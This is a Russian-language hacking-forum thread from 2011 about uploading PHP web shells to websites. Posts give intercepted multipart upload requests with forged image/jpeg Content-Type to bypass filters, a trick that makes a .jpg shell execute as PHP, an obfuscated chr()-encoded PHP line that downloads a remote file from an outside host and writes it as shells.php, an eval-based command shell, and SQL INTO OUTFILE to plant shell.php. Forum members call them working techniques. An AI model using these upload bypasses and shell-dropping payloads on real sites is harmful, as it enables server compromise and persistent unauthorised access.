 |
|

15.12.2011, 00:33
|
|
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
С нами:
8200406
Репутация:
38
|
|
Спасибо, все разжевано и доступно!
|
|
|

15.12.2011, 00:50
|
|
Познающий
Регистрация: 27.09.2008
Сообщений: 57
С нами:
9273960
Репутация:
23
|
|
Сообщение от попугай
просто многим не нравится, что жеванные фекалии преподносят как новые конфетки.
просто автор сам еще новичок, более в глаза бросается именно это, отсюда и недовольство)
|
|
|

15.12.2011, 00:55
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
Сообщение от Lee_fx
просто автор сам еще новичок, более в глаза бросается именно это, отсюда и недовольство)
Я не новичок я.. Средний
|
|
|

15.12.2011, 01:28
|
|
Участник форума
Регистрация: 09.02.2011
Сообщений: 218
С нами:
8029046
Репутация:
9
|
|
Вот еще один способ:
Например плагином Tamper Data для Mozilla Firefox.
Запускаешь перехват данных и пытаешься залить шелл, после чего жмешь вмешаться.
В ответ придет, что то вроде:
Сообщение от None
Код:
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n100000\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="uploaded"; filename="shell.php"\r\n
Content-Type:
application/octet-stream
\r\n\r\n\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="Upload"\r\n\r\nUpload\r\n
-----------------------------41184676334--\r\n
Меняешь на:
Сообщение от None
Код:
------------------------------41184676334\r\n
Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n100000\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="uploaded"; filename="shell.php"\r\n
Content-Type:
image/jpeg
\r\n\r\n\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="Upload"\r\n\r\nUpload\r\n
-----------------------------41184676334--\r\n
И отправляешь.
/showpost.php?p=2344055&postcount=4
Так же можно воспользоваться этим, но только наоборот для сокрытия шелла, мы начинаем закачивать шелл на сайт(в формате .jpg)и после начала перехватываем запрос тампер датой и что то вроде:
Сообщение от None
------------------------------41184676334\r\n
Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n100000\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="uploaded"; filename="shell.php"\r\n
Content-Type:
image/jpeg
\r\n\r\n\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="Upload"\r\n\r\nUpload\r\n
-----------------------------41184676334--\r\n[
меняем на:
Сообщение от None
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n100000\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="uploaded"; filename="shell.php"\r\n
Content-Type:
application/octet-stream
\r\n\r\n\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="Upload"\r\n\r\nUpload\r\n
-----------------------------41184676334--\r\n
и шелл в формате http://site.gov/images/logo.jpg исполняется как пхп файл в браузере
Только не начинайте гнобить...и ТСа тоже не гнобите, он наоборот молодец, а эту тему можно развивать и каждый будет вносить сюда свою лепту, частичку своего опыта и в скором будущем мы(сообщество античата)будем располагать огромными знаниями в этой области!
|
|
|

15.12.2011, 02:04
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
Сообщение от BLurpi^_^
Вот еще один способ:
Например плагином Tamper Data для Mozilla Firefox.
Запускаешь перехват данных и пытаешься залить шелл, после чего жмешь вмешаться.
В ответ придет, что то вроде:
Меняешь на:
И отправляешь.
/showpost.php?p=2344055&postcount=4
Так же можно воспользоваться этим, но только наоборот для сокрытия шелла, мы начинаем закачивать шелл на сайт(в формате .jpg)и после начала перехватываем запрос тампер датой и что то вроде:
меняем на:
и шелл в формате http://site.gov/images/logo.jpg исполняется как пхп файл в браузере
Только не начинайте гнобить...и ТСа тоже не гнобите, он наоборот молодец, а эту тему можно развивать и каждый будет вносить сюда свою лепту, частичку своего опыта и в скором будущем мы(сообщество античата)будем располагать огромными знаниями в этой области!
Эм, так то спс, но это уже есть в статье))
|
|
|

15.12.2011, 03:04
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от BLurpi^_^
и шелл в формате http://site.gov/images/logo.jpg исполняется как пхп файл в браузере
Зря спалил. Такие приваты в паблик выкладываешь.
|
|
|

15.12.2011, 08:29
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от Osstudio
"eval(file_get_contents('http://url/ws.txt'));" зачем ты написал эвал, если cmd=... итак эвалится?
Сообщение от KolosJey
::facepalm::
Объясню:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
Если ты просто так пошлёшь file_get_contents('http://url/ws.txt'), то у тебя будет:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
Т. е. file_get_contents никуда не запишишиться/не выполниться.
Однако в первом случае будет:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
Мы можем просто вписать:
Eval выполняет функции php, как вы видите, это мини шелл... используют так:
Код:
host.com/пут_до_той_папки_что_вы_указали/shells.php?cmd=function_php;
Как видите, без кавычек, а тип будет String Так что теперь делаем код:
Код:
$url = chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(108).chr(101).chr(103).chr(105).chr(111).chr(110).chr(101).chr(114).chr(115).chr(56).chr(56).chr(46).chr(110).chr(97).chr(114).chr(111).chr(100).chr(46).chr(114).chr(117).chr(47).chr(101).chr(114).chr(114).chr(111).chr(114).chr(46).chr(116).chr(120).chr(116);$content = file_get_contents($url);$h = fopen(shells.chr(46).php,w);$text = $content;fwrite($h,$text);fclose($h);
Parse error: syntax error, unexpected T_STRING in * on line 2
вписываем следующее:
Код:
UPDATE `table_name` SET `column_name_1` = '' WHERE `column_name_2` =[Значение] LIMIT 1 ;
SELECT * FROM `table_name` WHERE `column_name_2` =[Значение] INTO OUTFILE '[Полный_путь_до_папки_с_правами_закачки_файла/shell.php]' ;
Теперь переходим по адресу
Код:
host.com/пут_до_той_папки_что_вы_указали/shells.php
Это делается одним запросом.
Сообщение от None
5.) Пятый вариант - это отличный баг Windows, а именно, иногда сайт не разрешает закачивать PHP таким образом, что когда нажимаешь к примеру на кнопку "Обзор", то он показывает только файлы изображений, и т.п. Но не отчаивайтесь - просто нажмите на этот "Обзор" (
) зайдите в директорию с шеллом, и наберите тут его имя:
Открою секрет - в поле имя напиши *, перед тобой предстанут все файлы.
-------------
Модераторы - перенесите статью в болталку или удалите этот бред, буду благодарен.
|
|
|

15.12.2011, 13:52
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
XAMENA, +10500
Ты не модер? Вот если что профили модеров:
/member.php?u=90907
/member.php?u=22449
Сообщение от попугай
Зря спалил. Такие приваты в паблик выкладываешь.
P.S. Мне стыдно. А я то думал ачат огого
P.S.S. TC старался. Но увы...
|
|
|

15.12.2011, 14:35
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами:
8263766
Репутация:
11
|
|
попугай
он угарал,когда написал приват!
|
|
|

15.12.2011, 20:38
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
>Parse error: syntax error, unexpected T_STRING in * on line 2
Может, попробуешь пробелы убрать, которые ачат наставил автоматом хрен знает зачем?) (впрочем, как и в скулях..)
>Открою секрет - в поле имя напиши *, перед тобой предстанут все файлы.
Спасибо, буду знать
-------------
>Модераторы - перенесите статью в болталку или удалите этот бред, буду благодарен.
Это не бред, это работающие способы.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|